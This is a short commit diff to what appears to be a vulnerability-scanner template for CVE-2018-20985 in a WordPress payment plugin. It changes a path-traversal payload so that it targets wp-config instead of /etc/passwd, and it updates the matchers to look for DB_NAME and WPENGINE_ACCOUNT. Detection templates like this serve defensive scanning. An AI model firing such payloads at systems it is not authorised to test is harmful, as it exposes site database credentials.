Update CVE-2018-20985.yaml
parent
7afafb1f4f
commit
a0581944aa
|
@ -15,15 +15,15 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
|
||||
|
||||
body: "x_login=../../../etc/passwd"
|
||||
body: "x_login=../../../../wp-config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- DB_NAME
|
||||
- WPENGINE_ACCOUNT
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue